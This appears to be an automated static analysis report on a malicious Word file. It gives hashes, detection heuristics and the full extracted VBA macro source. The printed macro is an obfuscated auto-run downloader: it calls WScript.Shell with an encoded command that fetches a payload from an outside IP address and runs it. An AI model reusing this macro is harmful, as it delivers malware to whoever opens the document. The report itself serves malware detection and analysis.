Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cf0ee89b626684ed…

MALICIOUS

Office (OLE)

116.5 KB Created: 2017-01-19 23:05:00 Authoring application: Microsoft Office Word First seen: 2017-03-27
MD5: 9a9f84d7ade2e2802c1b2b584b668046 SHA-1: 50cbcc74be34dd64095386c29700630b42c2a7f1 SHA-256: cf0ee89b626684ed9f9f60823531dd1ed38cfd46395036209a274cadaf123575
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The presence of `CreateObject` and `CallByName` calls, along with a `Document_Open` auto-execution macro, strongly suggests the execution of arbitrary code. The ClamAV detection ID 'Doc.Macro.ObfuscatedObj-6171960-0' further confirms its malicious nature. The VBA script's intent appears to be downloading and executing a secondary payload, a common tactic for macro-based malware.

Heuristics 8

  • ClamAV: Doc.Macro.ObfuscatedObj-6171960-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedObj-6171960-0
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Function gvczjyuuksghiwm()
    Set dkdtwfqkuhyi = CreateObject(ThisDocument.acidclaim() & "HEll")
    Dim ggajinzielfae As Double
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    End If
    Call CallByName(dkdtwfqkuhyi, ThisDocument.zkviqqydjwx(), 345 / 345, ThisDocument.forestliberty(qtrvojnii), sqplgfyldylyovx)
    'slowtwelvepwkmvujvatykrvnotb
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Public Sub Document_Open()
    Dim dropridge As Integer
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10199 bytes
SHA-256: 0ee55d11f5a7f2f0eb635b821a29a37b294535f58a9293bdb1d0d478218031f6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
Dim dropridge As Integer
dropridge = 49
Dim detailten As Double
detailten = 26
Dim allowbattle As Boolean
allowbattle = 47
Dim ayjigmbtjn As Long
ayjigmbtjn = 27
Module1.gvczjyuuksghiwm
Dim addictdesk As Boolean
addictdesk = 230
If addictdesk > 89 Then
'jvwqildzegaxqaxrkscwvzapdccenuqux
Dim addictbarrel As Integer
addictbarrel = 16
Dim wcwsalmaw As String
wcwsalmaw = "employkeen"
Dim fxaqvthifk As String
fxaqvthifk = "cfcfbqcpikqilgui"
Dim rzrljiyslsakqni As Long
rzrljiyslsakqni = 55
End If
'donoressencepublictide
Dim ljwobpesrapniuvtjb As Double
ljwobpesrapniuvtjb = 111
If ljwobpesrapniuvtjb <> 199 Then
'behavegroceryeitherhazard
Dim augustreward As String
augustreward = "jobvanish"
Dim applespirit As Integer
applespirit = 209
End If
ActiveDocument.Shapes.SelectAll
'mandaterallyalmvzjqegcc
Dim dvbeufjlzqbzxx As Boolean
dvbeufjlzqbzxx = 30
Dim ubjnzxkgfiyzbvef As Boolean
ubjnzxkgfiyzbvef = 189
Dim nfyjshcwirgwtbloexu As Long
nfyjshcwirgwtbloexu = 234
Dim biologytogether As Boolean
biologytogether = 95
Selection.Delete
End Sub
Function forestliberty(abandonstereo)
qpvbwthqjg = ""
Dim rpkbftvqi As Double
rpkbftvqi = 65
If rpkbftvqi <> 108 Then
'eccuuvynhzpsralhsapewvwfobrrr
Dim hxmzjdplyuhplwhbptq As Double
hxmzjdplyuhplwhbptq = 234
Dim birdboard As Byte
birdboard = 168
End If
For sfutmxwtovtvcfb = 1 To Len(abandonstereo)
'crowdexhibitsmaecgleoaj
Dim pggtnucdf As Boolean
pggtnucdf = 187
If pggtnucdf < 219 Then
Dim romancetreat As String
romancetreat = "hornrain"
Dim erotidcqk As Integer
erotidcqk = 202
Dim possiblesight As Boolean
possiblesight = 117
End If
'jzoieqsuzmlurjtrzkbridgeoriginal
Dim collectobscure As Long
collectobscure = 153
If collectobscure = 3 Then
Dim yoddnhsvw As Byte
yoddnhsvw = 63
Dim mailneed As String
mailneed = "increaseridge"
Dim dosegeneral As Integer
dosegeneral = 254
Dim situatesoon As Byte
situatesoon = 147
Dim believepotato As Long
believepotato = 110
End If
askcapital = Mid(abandonstereo, sfutmxwtovtvcfb, 1)
'ueuyluvfsjagadgetsteel
Dim practicethrive As Double
practicethrive = 114
If practicethrive <> 139 Then
Dim qutakyawzzujzwuun As Byte
qutakyawzzujzwuun = 139
Dim wvisjgckz As Long
wvisjgckz = 162
Dim owplxoctkzyfmqa As Byte
owplxoctkzyfmqa = 178
End If
'pwdxezytgtycmslzrjhahigeymgd
Dim donkeypenalty As Boolean
donkeypenalty = 233
If donkeypenalty = 14 Then
Dim xbuytwnji As Boolean
xbuytwnji = 52
Dim hopelicense As Long
hopelicense = 30
Dim uxthmphdu As Byte
uxthmphdu = 6
Dim ezodhivrlv As Byte
ezodhivrlv = 221
Dim adaptmarine As Byte
adaptmarine = 111
End If
qpvbwthqjg = qpvbwthqjg & Module1.dealjump(askcapital)
Dim kynuwwwjxcrdyjrtk As Long
kynuwwwjxcrdyjrtk = 192
If kynuwwwjxcrdyjrtk < 30 Then
Dim pcrhtivzotowtghle As Long
pcrhtivzotowtghle = 96
Dim cwhrhlgmzhsso As Integer
cwhrhlgmzhsso = 41
Dim wbgptlphpaihjpmwq As String
wbgptlphpaihjpmwq = "qiglbrpllrnnhgpob"
Dim genrehour As String
genrehour = "imbiqxxgxveasksm"
End If
'feverjuniorwmaissxzibyayoqjwd
Dim nrifsktanynoeubczn As Double
nrifsktanynoeubczn = 108
If nrifsktanynoeubczn = 160 Then
Dim zhmwllzitjtmrnne As Long
zhmwllzitjtmrnne = 195
Dim djepsklcw As Boolean
djepsklcw = 66
Dim potteryrandom As Integer
potteryrandom = 109
Dim tveeqfpjmc As Long
tveeqfpjmc = 15
End If
Next
Dim fuzaclydeicdprwwhkz As Long
fuzaclydeicdprwwhkz = 23
If fuzaclydeicdprwwhkz = 207 Then
'xvprhxyghyhskobddedymprib
Dim marchunknown As Boolean
marchunknown = 87
Dim tenweird As Boolean
tenweird = 5
Dim garlicvacuum As Double
garlicvacuum = 54
End If
forestliberty = qpvbwthqjg
'rehbpfoudahbdqgbqorgansay
Dim jelejlnhefdmun As Double
jelejlnhefdmun = 230
Dim cwdyvtaxtbdahurlukl As Long
cwdyvtaxtbdahurlukl = 231
Dim executeladder As Double
executeladder = 99
Dim crumblevillage As Byte
crumblevillage = 28
End Function
Function zkviqqydjwx()
'clipgorillabasesix
Dim dustmetal As String
dustmetal = "seriesspeak"
Dim lgnvafdntdalwu As Byte
lgnvafdntdalwu = 121
Dim pilwsyxwqkpevjayy As String
pilwsyxwqkpevjayy = "eqpgvrtchukltsqnrdw"
zkviqqydjwx = "run"
End Function
Function acidclaim()
acidclaim = "wScrIPt.s"
End Function


Attribute VB_Name = "Module1"
Function gvczjyuuksghiwm()
Set dkdtwfqkuhyi = CreateObject(ThisDocument.acidclaim() & "HEll")
Dim ggajinzielfae As Double
ggajinzielfae = 69
If ggajinzielfae < 228 Then
'zpshqbsnyaxwhnyyhqmuststay
Dim awayearly As Long
awayearly = 28
Dim unveiluse As Boolean
unveiluse = 41
Dim keysurvey As Long
keysurvey = 96
Dim pettwo As Integer
pettwo = 138
Dim objectpatient As Long
objectpatient = 120
End If

'josbelmyvqqrabbitstable
Dim pelicanshop As Integer
pelicanshop = 101
If pelicanshop < 100 Then
'gadgetlizardneswtthzvncpg
Dim fjwivnzwqvqghqgs As Byte
fjwivnzwqvqghqgs = 2
Dim namepause As Byte
namepause = 108
Dim jlnpfmakqtafumpmcby As Integer
jlnpfmakqtafumpmcby = 225
Dim acgfnfiwxjgqolpsfb As Integer
acgfnfiwxjgqolpsfb = 177
Dim ilareztejtfdosixdj As String
ilareztejtfdosixdj = "hobbyunfold"
End If
'fgywibenqanlljfalhetidrrribtfsseo
Dim jzaorzdmwzmp As Long
jzaorzdmwzmp = 81
If jzaorzdmwzmp = 212 Then
Dim egrmpomsnx As Double
egrmpomsnx = 104
Dim bitterslim As Boolean
bitterslim = 37
Dim allowignore As Integer
allowignore = 75
Dim acqmuhmtxky As String
acqmuhmtxky = "tkaelxwjxwia"
End If
sqplgfyldylyovx = False
'jysuztblnzdsoclucjsentenceskin
Dim alcoholdynamic As Integer
alcoholdynamic = 181
If alcoholdynamic <> 128 Then
'vfdashtxnqbtqwqqgravityowner
Dim angersubmit As Double
angersubmit = 112
Dim slotwear As Byte
slotwear = 28
Dim executepeanut As Byte
executepeanut = 3
Dim gloveteach As Integer
gloveteach = 254
Dim wrwczanhuhaxt As Byte
wrwczanhuhaxt = 224
End If
qtrvojnii = "ZVC6mZjdVq.VeVZX6eVV 6/jjc6 6p6qoZZWVeVjr66sVh6VEjljjL6j.6Ej6xqeV Z-6VwqiVNjqdjoqw6SjjT6jY6l6eVj jhjZij6djd6Ve6N6 j-6NVjojPVRjOVfZViZlV6E6 Zj-Ze66XjEjc6UVTV6I6qoV6nVVp6OZlZIZC6jYV VVb66Y66PjAjjsV6sV 6(6ZNjjE6Zwq-6OjZBjJjVeZ6CZVt6 VSVYjSV6TjZejmZ.VNZVEqTj.Z6WqE6bjjCjVlqVIZEZnVT6j)66.jDVVoZWqNVqLjZo6aZ6DVF6jiqLVEZV(" & "qV'j6hqjt6tVpVj:jV/j/V16Z8Vq5j.V1j465j.q162qZ9j.q7V06V/Vji6Znqjij.Zjx6VyZZzj'Z,jZ'V%VTVZEq6MVP6%ZV\Z\qjijnVijfjijlVeV6.je6Vx6qej'jZ)Z jV&VZ jVrVeVgjj 6a6dZdVV jjHjjKZVCqUj\V\6ZSZoVfqVt6wja6r6eVZ\V\ZCVVlZa6VsjZs"
'exerciserangeoasjyrvunxbqeceo
Dim cointoday As Integer
cointoday = 10
If cointoday = 96 Then
'xvjitozskhjiyhitcgnmowbitpms
Dim rejbecwbcqsiguvvoxg As Byte
rejbecwbcqsiguvvoxg = 113
Dim forestswift As String
forestswift = "oiltunnel"
End If
Dim oxwddigmcjtypzk As Boolean
oxwddigmcjtypzk = 213
Dim customisland As Boolean
customisland = 67
Dim littlenation As Long
littlenation = 212
qtrvojnii = qtrvojnii & "jVej6sZ6\V6\q6mVVsjZcZ6fZVijql6jeZ\V\qs6hqVeZlVVlV6\6V\ZoZjp6qeVnVq\qZ\VcVjo6mV6mZaV6njVdZ6 j/V6dj 6%jVTVjEqVM66PZj%6V\q6\jji6nVqiVZf6qiqZlVeVq.VeZxZje6 6q/Vjf6V 66&Vq jejZv6eVZnjtjvZ6w6r6Z.6jeZxV6ejj V&6 6PZIZjNZqGZj q-jVnZ ZZ1656 ZZ16q2j7j6.606.660jV.j1Z>jnqVu6l6 V&Zj 6%6jTjEjMZZPjZ%VV\6q\qiVnVZiVfVqijVlj6e6j.jejxVVe"
Dim fbgnlfqjvcwtwznbvn As Long
fbgnlfqjvcwtwznbvn = 42
If fbgnlfqjvcwtwznbvn <> 119 Then
'kmidbzvspznjclyafraidbrave
Dim mhxteyressctlfftx As String
mhxteyressctlfftx = "hcjdvpaoargxblszeot"
Dim cfjmkayedgeuulkqri As Long
cfjmkayedgeuulkqri = 78
Dim describeokay As Long
describeokay = 94
Dim tmluoulgdunyngkkin As Byte
tmluoulgdunyngkkin = 163
End If
Call CallByName(dkdtwfqkuhyi, ThisDocument.zkviqqydjwx(), 345 / 345, ThisDocument.forestliberty(qtrvojnii), sqplgfyldylyovx)
'slowtwelvepwkmvujvatykrvnotb
Dim cutepanel As Long
cutepanel = 54
Dim latinmerit As Boolean
latinmerit = 140
Dim canoeswarm As Integer
canoeswarm = 220
Dim xheducuqke As Integer
xheducuqke = 114
End Function
Function dealjump(dealgarment)
Dim melclxurhqmjlc As Double
melclxurhqmjlc = 102
Dim celeryready As String
celeryready = "ezxathpbfekjdllrkp"
Dim cancelrural As Boolean
cancelrural = 77
Dim ownerweasel As Double
ownerweasel = 104
Dim gloryrun As Double
gloryrun = 131
'xadvghhzbkikdaxeruptillness
Dim privatesalad As Boolean
privatesalad = 92
Dim hobbyshuffle As Boolean
hobbyshuffle = 53
If Not "VVjZZj6Vj66q" Like "*" & dealgarment & "*" Then
'decoratedoubleapproveleisure
Dim considerpudding As Integer
considerpudding = 11
If considerpudding < 116 Then
Dim hldxrakkeyoc As Long
hldxrakkeyoc = 135
Dim ikdqjnwpxjyk As Byte
ikdqjnwpxjyk = 151
Dim dinosaurunknown As Long
dinosaurunknown = 14
End If
Dim jarrack As Integer
jarrack = 175
If jarrack = 238 Then
'damagepizzafewspawn
Dim vrxusaldi As Double
vrxusaldi = 112
Dim heavyparade As String
heavyparade = "lwmdhqgymtasp"
Dim kmkkgkpskbshvvxrihw As String
kmkkgkpskbshvvxrihw = "sentencevisa"
Dim pistoltaste As Integer
pistoltaste = 15
Dim rallytrust As Integer
rallytrust = 110
End If
dealjump = dealgarment
'essencesatoshishedsweet
Dim evolveprint As Integer
evolveprint = 23
If evolveprint > 55 Then
Dim euxowwferjgylmwz As Boolean
euxowwferjgylmwz = 211
Dim couchkid As Byte
couchkid = 15
Dim findgap As String
findgap = "liarunusual"
End If
Else
dealjump = ""
'apologychairhicbjcswoie
Dim antennanotice As Long
antennanotice = 79
Dim mubwlgslcdwxscz As Integer
mubwlgslcdwxscz = 21
Dim awlojdnmupdfx As Boolean
awlojdnmupdfx = 31
Dim deliverfinish As Double
deliverfinish = 51
End If
Dim iibesulypmzja As Boolean
iibesulypmzja = 121
Dim shpfjtounid As Integer
shpfjtounid = 204
Dim lessonsiren As Integer
lessonsiren = 79
Dim qzuelfxfceipahsyhwq As Integer
qzuelfxfceipahsyhwq = 160
'airanklepatrolpink
Dim forcehammer As Double
forcehammer = 6
If forcehammer < 214 Then
Dim hardthen As Integer
hardthen = 238
Dim littlesmoke As Boolean
littlesmoke = 253
Dim measurepeanut As Double
measurepeanut = 157
End If
End Function